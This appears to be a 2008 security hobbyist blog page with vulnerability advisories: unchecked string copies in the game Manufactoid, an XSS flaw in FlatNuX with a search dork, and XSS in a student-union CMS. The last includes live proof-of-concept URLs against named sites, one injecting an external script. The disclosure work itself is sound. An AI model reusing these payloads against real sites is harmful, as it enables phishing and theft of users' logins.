!

We’re not really working on anything special right now, why not join us and start writing about your hacking/security projects?

August 5 @ 08:44 PM | 0 Comments
September 30

JLTG Security Advisory 30.09.08

I. BACKGROUND
Manufactoid is a “game for engineers” with several levels in which you assemble blocks and write lua code to create a factory. More information can be found at the following URL:

http://www.zachtronicsindustries.com/pivot/entry.php?id=18

II. DESCRIPTION
Manufactoid reads in level files and saved games with little or no filtering, there are several locations throughout the code where strcpy and strcat. The software fails to check the length of various inputs from the ascii level and game-save files, which leads to the software crashing with the possibility of executing arbitrary code if further analysis is done.

III. ANALYSIS
Fuzzing of the level files has lead to the software crashing (with or without a “level complete” message) at varying points. Analysis of the decompiled code shows strcpy and strcat being used in several locations throughout the game which we believe may be exploitable through a specially crafted level file, although we have yet to prove this.

IV. DETECTION
We have confirmed the existence of this issue in Manufactoid. Other games in the series may have the same problem.

V. WORKAROUND
JLTG are unaware of any workaround for this issue, however since we can only crash the game so far we do not consider this bug to be critical.

VI. VENDOR RESPONSE
“You’re probably right – I wrote Manufactoid a long time ago, and without looking at the code I have no clue how I handled strings. I never intended for people to make their own levels, though, so that wasn’t an issue at the time. Good catch nevertheless!”

VII. RELEASE TIMELINE
30.09.08 Author contacted
08.09.08 Author acknowledged bug exists

VIII. CREDIT
Kærast at Just Lost The Game

IX. LEGAL NOTICES
Copyright 2008 JLTG.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

05:09 PM | 0 Comments
September 1

XSS Vulnerability in FlatNuX

—————————————————————-
Script: FlatNux
Site: http://flatnux.sourceforge.net/
Author: Kærast
Dork: Powered by FlatNuX
—————————————————————-
Exploit:
index.php?mod=login&op=rec_pass

Username field (nome) is vulnerable to xss injection.
—————————————————————-

09:23 AM | 0 Comments
August 26
3d89alltraffic080826185321.png

This diagram shows half a day’s logging of traffic across the Bradford-based repeater which plays part of a Yorkshire-wide network for Buses.

06:36 PM | 0 Comments
August 23

XSS Vulnerability in Self Generate CMS

Release Date: August 23 2008
Platform: Web
Severity: Important
Summary:

Bam host a large number of websites for student unions throughout the uk using a custom cms system called Self Generate. This vulnerability affects all of these websites and allows attackers to inject arbitrary html/javascript code into a browser session.

Status:

We have been unable to contact BamUK, SU Marketing, or Self Generate about this vulnerability. They have no email addresses listed and their contact form consistently returns error messages.

Details:

There are various instances throughout the cms system where html code can be injected into the page. The majority of these instances are where ‘page’ is passed as a GET value, eg. page=injected_data, which is improperly cleaned before being displayed in the sidebar. Successful exploitation of this could lead to users giving away their login details through a cleverly crafted url sent in a phishing email.

PoC:

http://www.ubuonline.co.uk/games/?referrer=main&page=%22%3E%3Cscript%20src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%3E%3C/script%3E

http://www.hullstudent.com/content/?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2

Recommendations:

Use existing contacts at Bam/Self Generate to ask whether your website is secure against all attacks (including xss and sql injection), and not just the ones we discovered today. We believe that since the code is heavily reused across all websites, it should be a relatively simple fix following a full code audit.

Users may also consider switching to an alternative cms system hosted inhouse which would make security auditing and fixing of bugs like these much easier.

02:55 PM | 0 Comments
Next → Page 1 of 4